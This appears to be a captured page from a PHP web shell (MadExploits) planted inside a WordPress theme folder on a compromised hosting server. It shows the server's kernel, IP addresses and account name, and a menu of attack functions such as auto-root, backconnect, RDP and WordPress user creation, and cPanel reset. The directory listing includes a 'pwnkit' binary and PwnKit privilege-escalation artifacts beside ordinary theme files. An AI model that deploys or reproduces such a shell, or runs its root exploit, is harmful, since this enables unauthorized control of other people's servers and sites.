Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
helper
[ DIR ]
drwxr-xr-x
lab
[ DIR ]
drwxr-xr-x
options
[ DIR ]
drwxr-xr-x
underscore
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
comment-form.php
6.49
KB
-rw-r--r--
comment-nav.php
585
B
-rw-r--r--
demo-import-config.php
22.07
KB
-rw-r--r--
global-functions.php
4.89
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register-custom-fonts.php
1.14
KB
-rw-r--r--
scripts.php
4.5
KB
-rw-r--r--
tgm-config.php
2.29
KB
-rw-r--r--
widget-area-register.php
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comment-nav.php
<?php /** * Comment Form navigation * * @package imroz */ ?> <nav class="comment-navigation" role="navigation"> <div class="row"> <div class="col-xs-12 col-sm-6"> <div class="post-link-nav"> <i class="rbt feather-arrow-left"></i> <?php previous_comments_link( esc_html__( 'Older Comments', 'imroz' ) ) ?> </div> </div> <div class="col-xs-12 col-sm-6 text-right"> <div class="post-link-nav"> <?php next_comments_link( esc_html__( 'Newer Comments', 'imroz' ) ) ?> <i class="rbt feather-arrow-right"></i> </div> </div> </div><!-- .row --> </nav>
Close